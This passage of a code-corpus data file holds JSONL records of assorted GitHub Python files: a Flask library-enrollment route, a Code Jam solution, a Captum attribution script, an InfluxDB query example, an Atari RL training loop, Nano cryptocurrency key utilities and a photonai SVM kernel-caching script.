"usage_type": "call"}, {"api_name": "views.RegisterAPIView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "views.LoginAPIView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "views.LoginAPIView", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "knox.views.LogoutView.as_view", "line_number": 12, "usage_type": "call"}, {"api_name": "knox.views.LogoutView", "line_number": 12, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "api.student.get_student_info", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "api.student.get_student_course_list", "line_number": 14, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "api.student.get_student_choice_list", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "api.student.create_choice", "line_number": 16, "usage_type": "argument"}]} +{"seq_id": "72239449153", "text": "from flask import render_template, request, redirect, url_for, flash\nfrom app.models import db, Partners, Menu, FastAccess, Contacts, WorkHours, SubMenu, Readers\nfrom app.public_bp.routes.core import normalize_date\nfrom app.public_bp import blueprint\nfrom flask_babel import get_locale, _\nfrom loguru import logger\n\n\n@blueprint.route('/enroll', methods=['GET', 'POST'])\n@logger.catch()\ndef enroll_in_library():\n title = _('Записаться в библиотеку')\n partners = Partners.query.all()\n fast_access = FastAccess.query.order_by(FastAccess.index).all()\n menu = db.session.query(Menu).order_by(Menu.index).all()\n contacts = Contacts.query.first()\n work_hours = WorkHours.query.first()\n\n full_nav = dict()\n for el in menu:\n list_submenu = db.session.query(SubMenu).filter_by(menu_parent_id=el.id).order_by(SubMenu.index).all()\n full_nav[el] = list_submenu\n if request.method == 'POST':\n email = request.form['email']\n name = request.form['name']\n surname = request.form['surname']\n patronymic = request.form['patronymic']\n birth_date = normalize_date(\n request.form['birth_date'])\n reader_category = request.form['category']\n work_place = request.form['work_place']\n group = request.form['group']\n address = request.form['address']\n phone: str = request.form['phone']\n if not phone.isdigit():\n flash('Введит�� телефон числами')\n return redirect(url_for('public.enroll_in_library'))\n if reader_category == 'Обучающийся':\n reader = Readers(email=email, name=name, surname=surname, patronymic=patronymic, birth_date=birth_date,\n category=reader_category, group=group, home_address=address, phone=phone)\n else:\n reader = Readers(email=email, name=name, surname=surname, patronymic=patronymic, birth_date=birth_date,\n category=reader_category, work_place=work_place, group=group,\n home_address=address, phone=phone)\n db.session.add(reader)\n db.session.commit()\n flash('Отправлено')\n return redirect(url_for('public.enroll_in_library'))\n return render_template('public_bp/enroll_in_library.html', title=title, menu=full_nav, partners=partners,\n fast_access=fast_access,\n locale=str(get_locale()), contacts=contacts, work_hours=work_hours)\n", "repo_name": "ganitsa-vadim/library_web_application", "sub_path": "web/app/public_bp/routes/enroll_in_library.py", "file_name": "enroll_in_library.py", "file_ext": "py", "file_size_in_byte": 2541, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask_babel._", "line_number": 12, "usage_type": "call"}, {"api_name": "app.models.Partners.query.all", "line_number": 13, "usage_type": "call"}, {"api_name": "app.models.Partners.query", "line_number": 13, "usage_type": "attribute"}, {"api_name": "app.models.Partners", "line_number": 13, "usage_type": "name"}, {"api_name": "app.models.FastAccess.query.order_by", "line_number": 14, "usage_type": "call"}, {"api_name": "app.models.FastAccess.query", "line_number": 14, "usage_type": "attribute"}, {"api_name": "app.models.FastAccess", "line_number": 14, "usage_type": "name"}, {"api_name": "app.models.FastAccess.index", "line_number": 14, "usage_type": "attribute"}, {"api_name": "app.models.db.session.query", "line_number": 15, "usage_type": "call"}, {"api_name": "app.models.Menu", "line_number": 15, "usage_type": "argument"}, {"api_name": "app.models.db.session", "line_number": 15, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 15, "usage_type": "name"}, {"api_name": "app.models.Menu.index", "line_number": 15, "usage_type": "attribute"}, {"api_name": "app.models.Contacts.query.first", "line_number": 16, "usage_type": "call"}, {"api_name": "app.models.Contacts.query", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.models.Contacts", "line_number": 16, "usage_type": "name"}, {"api_name": "app.models.WorkHours.query.first", "line_number": 17, "usage_type": "call"}, {"api_name": "app.models.WorkHours.query", "line_number": 17, "usage_type": "attribute"}, {"api_name": "app.models.WorkHours", "line_number": 17, "usage_type": "name"}, {"api_name": "app.models.db.session.query", "line_number": 21, "usage_type": "call"}, {"api_name": "app.models.SubMenu", "line_number": 21, "usage_type": "argument"}, {"api_name": "app.models.db.session", "line_number": 21, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 21, "usage_type": "name"}, {"api_name": "app.models.SubMenu.index", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request.method", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "app.public_bp.routes.core.normalize_date", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 32, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 37, "usage_type": "call"}, {"api_name": "app.models.Readers", "line_number": 39, "usage_type": "call"}, {"api_name": "app.models.Readers", "line_number": 42, "usage_type": "call"}, {"api_name": "app.models.db.session.add", "line_number": 45, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 45, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 45, "usage_type": "name"}, {"api_name": "app.models.db.session.commit", "line_number": 46, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 46, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 49, "usage_type": "call"}, {"api_name": "flask_babel.get_locale", "line_number": 51, "usage_type": "call"}, {"api_name": "app.public_bp.blueprint.route", "line_number": 9, "usage_type": "call"}, {"api_name": "app.public_bp.blueprint", "line_number": 9, "usage_type": "name"}, {"api_name": "loguru.logger.catch", "line_number": 10, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "23605251991", "text": "#!/usr/bin/python\r\n# 2010 Qualification\r\n''' Usage %s\r\n'''\r\nimport logging\r\n\r\nCurrentDebugLevel=logging.DEBUG\r\n\r\ndef CalculateTotalEarning(earnList, repeatStart, runNum):\r\n total = 0\r\n nonRepeatTotal = 0\r\n repeatTotal = 0\r\n \r\n repeatAt = -1\r\n for i, p in enumerate(earnList):\r\n if p[0] == repeatStart:\r\n repeatAt = i\r\n break\r\n nonRepeatTotal += p[1]\r\n\r\n if repeatAt >= 0: # the rest run will repeat the same sequence from repeatStart\r\n for i in range(repeatAt, len(earnList)):\r\n repeatTotal += earnList[i][1]\r\n total += repeatTotal\r\n if runNum > 0: # if we need more than one repeat those runs in earnList\r\n repeatLen = len(earnList) - repeatAt # there are how many runs in repeat area\r\n if repeatLen > 0:\r\n total += (int(runNum / repeatLen) * repeatTotal)\r\n runNum %= repeatLen\r\n for i in range(repeatAt, repeatAt + runNum):\r\n total += earnList[i][1]\r\n return total + nonRepeatTotal\r\n\r\ndef VerifyCase2(runNum, capacity, groupList):\r\n total = 0\r\n while runNum > 0:\r\n earnSum = 0\r\n isFull = False\r\n for i in range(start, len(groupList)):\r\n if earnSum + groupList[i] <= capacity:\r\n earnSum += groupList[i]\r\n else:\r\n start = i\r\n isFull = True\r\n break\r\n runNum -= 1\r\n\r\ndef VerifyCase(runNum, capacity, groupList):\r\n total = 0\r\n start = 0\r\n isOnceServe = False\r\n isFirst = True\r\n while runNum > 0:\r\n earnSum = 0\r\n isFull = False\r\n for i in range(start, len(groupList)):\r\n if earnSum + groupList[i] <= capacity:\r\n earnSum += groupList[i]\r\n else:\r\n start = i\r\n isFull = True\r\n break\r\n if isFirst:\r\n isFirst = False\r\n if start == 0: # we have very few guests to serve, so we can serve them once for all\r\n isOnceServe = True\r\n break\r\n if not isFull and earnSum < capacity: \r\n start = 0 # start over\r\n for i in range(start, len(groupList)):\r\n if earnSum + groupList[i] <= capacity:\r\n earnSum += groupList[i]\r\n else:\r\n start = i\r\n isFull = True\r\n break\r\n elif not isFull:\r\n start = 0\r\n \r\n total += earnSum\r\n runNum -= 1\r\n \r\n if isOnceServe:\r\n total = sum(groupList) * runNum\r\n\r\n return total\r\n\r\ndef ProcessCase(inFile, caseNum):\r\n logging.debug('Case %d', caseNum)\r\n param = inFile.readline().strip().split()\r\n #logging.debug(param)\r\n groupList = [int(x) for x in inFile.readline().strip().split()]\r\n oldRunNum = runNum = int(param[0])\r\n capacity = int(param[1])\r\n \r\n startSet = set() # where it starts\r\n earnList = [] # start from which and earn how much\r\n \r\n start = 0\r\n isOnceServe = False\r\n isFirst = True\r\n while runNum > 0:\r\n startSet.add(start)\r\n earnSum = 0\r\n oldStart = start\r\n isChangedStart = False\r\n for i in range(start, len(groupList)):\r\n if earnSum + groupList[i] <= capacity:\r\n earnSum += groupList[i]\r\n else:\r\n start = i \r\n isChangedStart = True\r\n break\r\n if isFirst:\r\n isFirst = False\r\n if start == 0: # we have very few guests to serve, so we can serve them once for all\r\n isOnceServe = True\r\n break\r\n if not isChangedStart and earnSum < capacity: \r\n start = 0 # start over\r\n for i in range(start, len(groupList)):\r\n if earnSum + groupList[i] <= capacity:\r\n earnSum += groupList[i]\r\n else:\r\n start = i \r\n break\r\n elif not isChangedStart: start = 0 # start over\r\n earnList.append((oldStart, earnSum))\r\n runNum -= 1\r\n if start in startSet: break # we already done this before\r\n if isOnceServe:\r\n total = sum(groupList) * runNum\r\n #total = CalculateTotalEarning([(0, sum(groupList))], 0, runNum)\r\n else:\r\n total = CalculateTotalEarning(earnList, start, runNum)\r\n \r\n# realTotal = VerifyCase(oldRunNum, capacity, groupList)\r\n# if realTotal != total: \r\n# logging.debug(\"Error Case #%d: %d != %d\", caseNum, realTotal, total);\r\n# logging.debug(\"%d %d %d\", oldRunNum, capacity, int(param[2]))\r\n# logging.debug(groupList)\r\n result = [total]\r\n \r\n return result\r\n\r\ndef OutputResult(outFile, caseNum, result):\r\n value = result[0]\r\n outFile.write(\"Case #{0}: {1}\\n\".format(caseNum, value))\r\n logging.debug(\"Case #{0}: {1}\\n\".format(caseNum, value))\r\n\r\ndef ProcessDataFile(fileName):\r\n inFile = open(fileName, 'r')\r\n line = inFile.readline()\r\n lineCount = int(line)\r\n outFile = open(fileName + '.out.txt', 'w')\r\n for i in range(1, lineCount + 1):\r\n result = ProcessCase(inFile, i)\r\n OutputResult(outFile, i, result)\r\n outFile.close()\r\n\r\ndef main():\r\n logging.basicConfig(level=CurrentDebugLevel, datefmt='%Y.%m.%d %H:%M:%S', format='%(asctime)s %(levelname)-5s %(message)s')\r\n question = 'C'\r\n #dataSet = 'small'\r\n dataSet = 'large'\r\n #dataSet = 'test'\r\n #attempt = '-attempt1'\r\n attempt = ''\r\n\r\n ProcessDataFile('{0}-{1}{2}.in'.format(question, dataSet, attempt))\r\n\r\nif __name__ == '__main__': main()", "repo_name": "dr-dos-ok/Code_Jam_Webscraper", "sub_path": "solutions_python/Problem_55/376.py", "file_name": "376.py", "file_ext": "py", "file_size_in_byte": 5624, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.DEBUG", "line_number": 7, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 89, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 149, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 162, "usage_type": "call"}]} +{"seq_id": "41615633073", "text": "import os\nimport argparse\nimport yaml\nimport numpy as np\nfrom tqdm.auto import tqdm, trange\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader, Dataset\nimport torchvision.transforms as transforms\n\nfrom captum.attr import IntegratedGradients\n\nfrom .dataset import CUBADataset\nfrom .loader import load_dataset_and_model\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('dset_name', type=str)\n parser.add_argument('x2y_model_path', type=str, help=\"Should be the checkpoint file.\")\n parser.add_argument('save_path', type=str, help=\"Path to save the attributed numpy file.\")\n parser.add_argument('--x2y_arch_name', type=str, default='inception_v3', \n choices=['inception_v3', 'resnet50', 'dup-resnet50', 'vgg11_bn', 'vgg16_bn'])\n parser.add_argument('--split', type=str, default='test', choices=['train', 'val', 'test'])\n parser.add_argument('--data_root_dir', type=str, default='/home/andrewbai/data/')\n # parser.add_argument('--attr_root_dir', type=str, default='/home/andrewbai/attrs/')\n # parser.add_argument('--save_fname_suffix', type=str, default=None)\n \n parser.add_argument('--bsize', type=int, default=32,\n help=\"Does not affect result. Only affects speed. Reduce when OOM.\")\n parser.add_argument('--x2y_cfg_path', type=str, default=None)\n return parser.parse_args()\n\ndef main():\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n args = parse_arguments()\n \n x2y_model_kwargs = {}\n if args.x2y_cfg_path is not None:\n with open(args.x2y_cfg_path, 'r') as f:\n x2y_model_kwargs = yaml.safe_load(f)\n \n x2y_dl_train, x2y_dl_valid, x2y_dl_test, x2y_model = load_dataset_and_model(\n dset_name=args.dset_name, task='x2y', data_root_dir=args.data_root_dir, \n use_all_data=False, arch_name=args.x2y_arch_name, bsize=args.bsize, model_kwargs=x2y_model_kwargs)\n x2y_model.load_state_dict(torch.load(args.x2y_model_path))\n x2y_model = x2y_model.to(device).eval()\n\n ig = IntegratedGradients(x2y_model, multiply_by_inputs=False)\n attrs = []\n \n if args.split == 'val':\n dl = x2y_dl_valid\n elif args.split == 'test':\n dl = x2y_dl_test\n else:\n raise ValueError\n\n for x, y in tqdm(dl, leave=True):\n x = x.to(device)\n x.requires_grad = True\n y = y.to(device)\n\n attr = ig.attribute(x, baselines=None, target=y)\n attr = attr.detach().cpu().numpy()\n attrs.append(attr)\n\n attrs = np.concatenate(attrs, axis=0)\n np.save(args.save_path, attrs)\n\nif __name__ == '__main__':\n main()\n", "repo_name": "jybai/concept-gradients", "sub_path": "src/cg/attribute_ig.py", "file_name": "attribute_ig.py", "file_ext": "py", "file_size_in_byte": 2674, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 35, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 41, "usage_type": "call"}, {"api_name": "loader.load_dataset_and_model", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 46, "usage_type": "call"}, {"api_name": "captum.attr.IntegratedGradients", "line_number": 49, "usage_type": "call"}, {"api_name": "tqdm.auto.tqdm", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "17852054846", "text": "import influxdb_client\nfrom influxdb_client.client.write_api import SYNCHRONOUS\n\nbucket = \"my-bucket\"\norg = \"my-org\"\ntoken = \"kiuEBYPAHnXdQDEdDoK3lUbZD3PLycFY4-QncqfFQKukiU2P0sNAZVKVYzBXTW8jWs7MK-gNyijcFDwDu5zmjw==\"\n# Store the URL of your InfluxDB instance\nurl=\"http://localhost:8086\"\n\n#Setup database\nclient = influxdb_client.InfluxDBClient(\n url=url,\n token=token,\n org=org\n)\n\nquery_api = client.query_api()\n\nquery = 'from(bucket:\"my-bucket\")\\\n|> range(start: -10m)\\\n|> filter(fn:(r) => r._measurement == \"my_measurement\")\\\n|> filter(fn: (r) => r.location == \"Prague\")\\\n|> filter(fn:(r) => r._field == \"temperature\" )'\n\nresult = query_api.query(org=org, query=query)\n\nresults = []\nfor table in result:\n for record in table.records:\n results.append((record.get_field(), record.get_value()))\n\nprint(results)", "repo_name": "EricvanLessen/mean-edge-detection-app", "sub_path": "influxdb2-python/02-query-data-from-influxdb.py", "file_name": "02-query-data-from-influxdb.py", "file_ext": "py", "file_size_in_byte": 818, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "influxdb_client.InfluxDBClient", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "27611436716", "text": "\"\"\"\nScript to run experiments. See configs.py for command line argument parser. Usage:\npython3 run_atari.py --game Breakout\nwill run the Successor Uncertainties model on Breakout with the parameters used in the paper.\nOnce run has finished, see run_test.py to obtain a test score.\n\"\"\"\n\nimport logging\nimport time\n\nfrom torch.nn.utils import clip_grad_norm_\nfrom torch.optim import Adam\n\nimport configs\nfrom models.policies import UniformPolicy\nfrom replay_buffer import ReplayBuffer\n\n\ndef play_episode(n_steps, manager, env, model, policy, replay_buffer, optim, config):\n ep_start_steps, t0 = n_steps, time.time()\n state, ep_reward, terminal = env.reset(), 0, False\n\n policy.start_new_episode()\n\n while not terminal:\n action = policy(state.torch().cuda())\n\n next_state, reward, terminal, info = env.step(action)\n\n replay_buffer.add(state, action, reward, next_state, terminal)\n policy.update(state, action, reward)\n state = next_state\n\n ep_reward += reward\n n_steps += 1\n\n if optim and n_steps % config.train_interval == 0:\n optim.zero_grad()\n\n if n_steps % config.update_interval == 0:\n model.update_params()\n\n model.loss(replay_buffer.sample()).backward()\n clip_grad_norm_(model.parameters(), config.grad_clip_norm)\n optim.step()\n\n manager.record_losses(n_steps, model.named_loss_dict)\n\n fps = (n_steps - ep_start_steps) / (time.time() - t0)\n manager.record_policy(n_steps, policy)\n manager.record_episode(n_steps, info, ep_reward, fps=fps)\n return n_steps\n\n\ndef run_atari_experiment(args, verbose=True, log_dir='logs'):\n config = configs.AtariArgParse().parse_args(args)\n manager, env, model, policy = configs.construct_rl_modules(config, log_dir)\n\n if not verbose:\n logging.getLogger().setLevel('ERROR')\n replay_buffer = ReplayBuffer(config.buffer_size, config.batch_size)\n\n n_steps = 0\n while n_steps < config.learning_start_step:\n n_steps = play_episode(n_steps, manager, env, model, UniformPolicy(policy.action_size),\n replay_buffer, None, config)\n\n optim = Adam(model.parameters(), lr=config.lr)\n manager.training_started = True\n\n while n_steps < config.total_num_steps:\n n_steps = play_episode(n_steps, manager, env, model, policy, replay_buffer, optim, config)\n\n return manager.end_report()\n\n\nif __name__ == '__main__':\n run_atari_experiment(args=None)\n", "repo_name": "DavidJanz/successor_uncertainties_atari", "sub_path": "run_atari.py", "file_name": "run_atari.py", "file_ext": "py", "file_size_in_byte": 2508, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "61", "api": [{"api_name": "time.time", "line_number": 20, "usage_type": "call"}, {"api_name": "replay_buffer.add", "line_number": 30, "usage_type": "call"}, {"api_name": "replay_buffer.sample", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 49, "usage_type": "call"}, {"api_name": "configs.AtariArgParse", "line_number": 56, "usage_type": "call"}, {"api_name": "configs.construct_rl_modules", "line_number": 57, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 60, "usage_type": "call"}, {"api_name": "replay_buffer.ReplayBuffer", "line_number": 61, "usage_type": "call"}, {"api_name": "models.policies.UniformPolicy", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "11118454917", "text": "#!/usr/bin/env python3\n\n\nfrom pyblake2 import blake2b\nfrom bitstring import BitArray\n\nfrom .pure25519 import ed25519_oop as ed25519\nfrom .zbase32 import decode as b32_decode\nfrom .zbase32 import encode as b32_encode\nfrom .types_convert import to_bytes\n\n\nGENESIS_ADDRESS = 'xrb_3t6k35gi95xu6tergt6p69ck76ogmitsa8mnijtpxm9fkcm736xtoncuohr3'\nGENESIS_VERIFYING_KEY = bytes.fromhex('E89208DD038FBB269987689621D52292AE9C35941A7484756ECCED92A65093BA')\n\n\nclass Account(object):\n\n def __init__(self, signing_key=None, verifying_key=None, address=None):\n \"\"\"\n Create an account with signing_key that can sign/verify, or only verifying_key/address that can verify.\n No seed involved, so one Account can hold only one signing key.\n \"\"\"\n self.signing_key = signing_key\n self.verifying_key = verifying_key\n self.address = address\n\n self._signing_key_bytes = None\n self._verifying_key_bytes = None\n\n self._is_genesis = False\n\n self._prepare_account()\n\n def __str__(self):\n \"\"\"\n Reture a readable address.\n \"\"\"\n return self.xrb_address\n\n @property\n def address_valid(self):\n return address_valid(self.address)\n\n @property\n def xrb_address(self):\n return verifying_key_to_address(self._verifying_key_bytes)\n\n def _to_signing_key(self, data):\n \"\"\"\n Convert data to signing key if legal, return bytes.\n \"\"\"\n\n return to_bytes(data, 32)\n\n def _to_verifying_key(self, data):\n \"\"\"\n Convert data to verifying key if legal, return bytes.\n \"\"\"\n\n vk = to_bytes(data, 32)\n if not vk and isinstance(data, str) and address_valid(data):\n vk = address_to_verifying_key(data)\n return vk\n\n def _prepare_account(self):\n \"\"\"\n If signing_key is given, generate verifying_key/address from signing_key.\n If not, generate address/verifying_key from each other.\n \"\"\"\n\n if not self.signing_key and not self.verifying_key and not self.address:\n raise Exception('signing_key/verifying_key/address, must give at least one')\n\n signing_key_bytes = self._to_signing_key(self.signing_key)\n verifying_key_bytes = self._to_verifying_key(self.verifying_key)\n address_bytes = self._to_verifying_key(self.address)\n\n if signing_key_bytes:\n _verifying_key_bytes = signing_to_verifying_key(signing_key_bytes)\n\n # Guard against signing_key/verifying_key/address mismatch.\n if verifying_key_bytes and _verifying_key_bytes != verifying_key_bytes:\n raise Exception('signing_key and verifying_key not match')\n if address_bytes and _verifying_key_bytes != address_bytes:\n raise Exception('signing_key and address not match')\n\n self._signing_key_bytes = signing_key_bytes\n self._verifying_key_bytes = _verifying_key_bytes\n\n else:\n\n if verifying_key_bytes:\n if address_bytes and verifying_key_bytes != address_bytes:\n raise Exception('verifying_key and address not match')\n self._verifying_key_bytes = verifying_key_bytes\n\n elif address_bytes:\n if verifying_key_bytes and verifying_key_bytes != address_bytes:\n raise Exception('verifying_key and address not match')\n self._verifying_key_bytes = address_bytes\n\n if self._verifying_key_bytes == GENESIS_VERIFYING_KEY:\n self._is_genesis = True\n\n def sign_block(self, block_hash):\n \"\"\"\n Return the signature of a hash.\n \"\"\"\n\n if not self._signing_key_bytes:\n raise Exception('can not sign block since signing_key is not given')\n\n hash_bytes = to_bytes(block_hash, 32, strict=True)\n\n sk_obj = ed25519.SigningKey(self._signing_key_bytes)\n return sk_obj.sign(hash_bytes)\n\n def signature_valid(self, block_hash, signature):\n \"\"\"\n Use verifying key to verify block hash and the signature, return True or False\n \"\"\"\n\n if not self._verifying_key_bytes:\n raise Exception('can not verify block since verifying_key or address is not given')\n\n hash_bytes = to_bytes(block_hash, 32, strict=True)\n signature_bytes = to_bytes(signature, 64, strict=True)\n\n vk_obj = ed25519.VerifyingKey(self._verifying_key_bytes)\n try:\n vk_obj.verify(signature_bytes, hash_bytes)\n return True\n except:\n return False\n\n\ndef seed_to_signing_key(seed, index=0):\n \"\"\"\n from raiblocks seed to private key (ed25519 seed)\n\n :param str seed: the hex string of raiblocks seed, 64 characters long\n :param int index: the index of wallet address\n\n :rtype: bytes\n :return: signing key\n\n Code Example::\n\n seed = 'CCC020CAF01C98B6B076A9F00573503E0D7FBA85BC7CA21AF3B3C02A2DDF5326'\n sk = seed_to_signing_key(seed, 1)\n print(sk.hex())\n\n \"\"\"\n\n h = blake2b(digest_size=32)\n\n seed_bytes = bytes.fromhex(seed)\n h.update(seed_bytes)\n\n index_bits = BitArray(uint=index, length=32)\n index_bytes = index_bits.tobytes()\n\n h.update(index_bytes)\n\n return h.digest()\n\n\ndef signing_to_verifying_key(sk):\n \"\"\"\n ed25519 signing key to verifying key\n\n :param bytes sk: signing key\n\n :rtype: bytes\n :return: verifying key\n\n \"\"\"\n\n sk_obj = ed25519.SigningKey(sk)\n vk_obj = sk_obj.get_verifying_key()\n return vk_obj.to_bytes()\n\n\ndef verifying_key_to_address(vk):\n \"\"\"\n ed25519 verifying key to raiblocks address\n\n :param bytes vk: verifying key\n\n :rtype: str\n :return: raiblocks address\n\n \"\"\"\n\n addr_b32 = b32_encode(vk)\n\n addr_checksum = bytearray(blake2b(vk, digest_size=5).digest())\n addr_checksum.reverse()\n checksum_b32 = b32_encode(addr_checksum)\n\n address = 'xrb_' + addr_b32 + checksum_b32\n return address\n\n\ndef address_to_verifying_key(address):\n \"\"\"\n raiblocks address to ed25519 verifying key\n\n :param str address: raiblocks address\n\n :rtype: bytes\n :return: ed25519 verifying key\n\n \"\"\"\n\n addr_b32 = address[4:56]\n vk = b32_decode(addr_b32)\n return vk\n\n\ndef address_valid(address):\n vk = address_to_verifying_key(address)\n new_addr = verifying_key_to_address(vk)\n\n if address == new_addr:\n return True\n else:\n return False\n\n", "repo_name": "goophile/pico", "sub_path": "pico/libs/account.py", "file_name": "account.py", "file_ext": "py", "file_size_in_byte": 6459, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "types_convert.to_bytes", "line_number": 54, "usage_type": "call"}, {"api_name": "types_convert.to_bytes", "line_number": 61, "usage_type": "call"}, {"api_name": "types_convert.to_bytes", "line_number": 114, "usage_type": "call"}, {"api_name": "pure25519.ed25519_oop.SigningKey", "line_number": 116, "usage_type": "call"}, {"api_name": "pure25519.ed25519_oop", "line_number": 116, "usage_type": "name"}, {"api_name": "types_convert.to_bytes", "line_number": 127, "usage_type": "call"}, {"api_name": "types_convert.to_bytes", "line_number": 128, "usage_type": "call"}, {"api_name": "pure25519.ed25519_oop.VerifyingKey", "line_number": 130, "usage_type": "call"}, {"api_name": "pure25519.ed25519_oop", "line_number": 130, "usage_type": "name"}, {"api_name": "pyblake2.blake2b", "line_number": 156, "usage_type": "call"}, {"api_name": "bitstring.BitArray", "line_number": 161, "usage_type": "call"}, {"api_name": "pure25519.ed25519_oop.SigningKey", "line_number": 180, "usage_type": "call"}, {"api_name": "pure25519.ed25519_oop", "line_number": 180, "usage_type": "name"}, {"api_name": "zbase32.encode", "line_number": 196, "usage_type": "call"}, {"api_name": "pyblake2.blake2b", "line_number": 198, "usage_type": "call"}, {"api_name": "zbase32.encode", "line_number": 200, "usage_type": "call"}, {"api_name": "zbase32.decode", "line_number": 218, "usage_type": "call"}]} +{"seq_id": "39474670143", "text": "import os\n\nfrom sklearn.datasets import make_classification\nfrom sklearn.model_selection import ShuffleSplit\nfrom sklearn.metrics.pairwise import rbf_kernel\nfrom joblib import Memory\n\nfrom photonai import Hyperpipe, PipelineElement, FloatRange\n\n\ncache_dir = './tmp/kernel_cache'\nos.makedirs(cache_dir, exist_ok=True)\nmemory = Memory(cachedir=cache_dir, verbose=0)\n\n\n@memory.cache\ndef cached_rbf(X, Y):\n return rbf_kernel(X, Y)\n\n\n# create toy data\nn_features = 10000\nn_samples = 1000\nn_informative = 10\nX, y = make_classification(n_samples, n_features, n_informative=n_informative)\ngamma = 1 / n_features\n\n\"\"\"\nEspecially with large datasets, it is unnecessary to recompute the kernel for every hyperparameter configuration.\nFor that reason, you can pass a cached kernel function that will only recompute the kernel if the input data changes.\nIf you don't want to cache the kernel, it still decreases the computation time by magnitudes when passing the kernel\nas dedicated function. See this issue for details: \nhttps://github.com/scikit-learn/scikit-learn/issues/21410\nhttps://stackoverflow.com/questions/69680420/using-a-custom-rbf-kernel-function-for-sklearns-svc-is-way-faster-than-built-in\n\"\"\"\n#kernel = 'kernel'\n#kernel = rbf_kernel\nkernel = cached_rbf\n\npipe = Hyperpipe('svm_with_custom_kernel',\n inner_cv=ShuffleSplit(n_splits=1, test_size=0.2),\n outer_cv=ShuffleSplit(n_splits=1, test_size=0.2),\n optimizer='sk_opt',\n optimizer_params={'n_configurations': 15},\n metrics=['accuracy', 'precision', 'recall', 